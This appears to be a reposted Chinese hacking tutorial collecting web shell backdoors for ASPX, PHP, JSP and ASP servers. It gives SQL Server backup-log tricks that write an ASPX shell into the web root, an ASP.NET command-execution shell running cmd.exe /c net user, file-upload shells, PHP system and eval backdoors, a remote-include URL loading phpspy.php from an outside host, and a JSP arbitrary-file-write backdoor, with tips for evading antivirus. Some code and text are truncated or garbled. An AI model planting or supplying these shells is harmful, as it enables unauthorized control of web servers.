aspx

1.相當(dāng)于ASP的一句話木馬:

程序代碼

alter database pubs set RECOVERY FULL--

create table pubs.dbo.cmd(a image)

backup log pubs to disk = 'c:\TM' with init

insert into pubs.dbo.cmd(a) values ('

System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ')

backup log pubs to disk = 'd:\test11.aspx'

//這個和asp的一樣，客戶端post一個變量l 把木馬代碼丟在變量l里面就ok了 這個是類似asp的一句話木馬。

//mu.aspx.htm 客戶端:(提交后訪問:http://IP/images.aspx)

在下面輸入大馬內(nèi)容:

Sub RunCmd(Src As Object, E As EventArgs)

Dim myProcess As New Process()

Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)

myProcessStartInfo.UseShellExecute = False

myProcessStartInfo.RedirectStandardOutput = true

myProcess.StartInfo = myProcessStartInfo

myProcessStartInfo.Arguments=xCmd.text

myProcess.Start()

Dim myStreamReader As StreamReader = myProcess.StandardOutput

Dim myString As String = myStreamReader.Readtoend()

myProcess.Close()

mystring=replace(mystring,"

mystring=replace(mystring,">",">")

result.text= vbcrlf & "

" & mystring & ""

End Sub

ASP.NET Shell for WebAdmin2.X Final

;Program

c:\windows\system32\cmd.exe

Arguments

/c net user

Text="Run">

alter database pubs set RECOVERY FULL

create table pubs.dbo.cmd(a image)

backup log pubs to disk = 'c:\TM' with init

insert into pubs.dbo.cmd(a) values ('private void bc(object o,EventArgs e) {string

u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos +

1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}

id="f" runat="server"/>

')

backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'

PHP

本文沒有什么特別之處，僅求拋磚引玉。并送給和我一樣菜的在PHP門邊徘徊的朋友。

剛學(xué)PHP沒幾天，我就急于功成，所以有錯誤及不足之處請大家積極指出。

PHP語法的強(qiáng)大是ASP望塵莫及的，僅一個: phpinfo();?>就可以刺探整個服務(wù)器的配置。運(yùn)行cmd，上傳文件等，都是非常簡便的，現(xiàn)在用的

好的PHP木馬，莫過于angel的phpspy了。昨天hak_ban問怎么給PHP木馬加密，我還沒想到，但是對于寫一個微型PHP木馬，我想還是很難被殺的

。

這里簡單探討一下幾個函數(shù)可以作為木馬的使用：

1．可以運(yùn)行外部命令的幾個函數(shù)：system,passthru,exec,shell_exec,popen。

例：只要將<?system ($cmd);?>等保存為cmd.php及可實現(xiàn)運(yùn)行外部命令的功能。這幾個函數(shù)可以說是最早的微行php木馬了，所以一般虛擬主機(jī)

的設(shè)置也會將這些函數(shù)屏蔽的。

2．還記得WDB論壇的style.php的漏洞嗎？我們可以利用這個做個很難被殺的小木馬。如下：

將其保存為1.php ，我們就可以調(diào)用其他不支持php服務(wù)器里的.php木馬(如phpspy.php)來達(dá)到我們的目的：http://target.com/1.php?

Include=http://www.xxx.com/phpspy.php

這里http://www.918x.com是不支持php的，否則將會在http://www.xxx.com這臺服務(wù)器運(yùn)行phpspy.php,而不是目標(biāo)服務(wù)器。

3． 這個還是angel在Discuz 2.2F的攻擊中給我們的一個非常好的上傳木馬，我沒有改：

將其保存為up.php后，在本地提交表單：

就可以把大個的php木馬上傳上去。

4．我一直在想有沒有同冰狐浪子的那個ASP一句話木馬一樣通過本地表單提交運(yùn)行的PHP木馬。終于找到了函數(shù)：eval，在PHP4中文參考手冊上

它的語法說明：

語法: void eval(string code_str);

內(nèi)容說明：本函數(shù)可將字符串之中的變量值代入，通常用在處理數(shù)據(jù)庫的資料上。參數(shù) code_str 為欲處理的字符串。值的米⒁獾氖譴淼淖址

PHP 的字符串格式，同時在結(jié)尾處要有分號。使用本函數(shù)處理后的字符串會沿續(xù)到 PHP 程序結(jié)束。

我們可以在目標(biāo)主機(jī)上保存:<?eval ($cmd);?>為一個PHP文件(我想也可以插在PHP任意文件里)。然后通過本地提交來達(dá)到目的，但與ASP不同

的是，在magic_quotes_gpc = on的時候，過濾的很多的字符，使得這個使用功能大大的縮小。

對于這個PHP木馬本地表單我做了很多次，還沒有成熟的代碼。還請高手指教。寫好后會奉獻(xiàn)給大家的。但是eval這個函數(shù)可以做微型PHP木馬

是無須質(zhì)疑的。

Ps:寫完后，有人告訴我，其實高手早就有微型的PHP木馬了，只是沒有公開。哎，我好郁悶啊，研究的都是人家早就有了的成果。不管怎么樣

，和大家分享一下我的研究，希望能得到幫助和指教。

JSP

＜%

if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter

("f"))).write(request.getParameter("t").getBytes());

%＞

這個 后門估計不用我說了吧.還是提示一下咯.保存為1.jsp 提交url!

然后:http://localhost/1.txt 就出來了 內(nèi)容為 hello .....

asp

用一句話客戶端連接，加入容錯語句，你可以把它插入到任何ASP文件而不會像以前一樣出錯。

總結(jié)

以上是生活随笔為你收集整理的jsp写php一句话,asp,aspx,php,jsp下的一句话木马的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。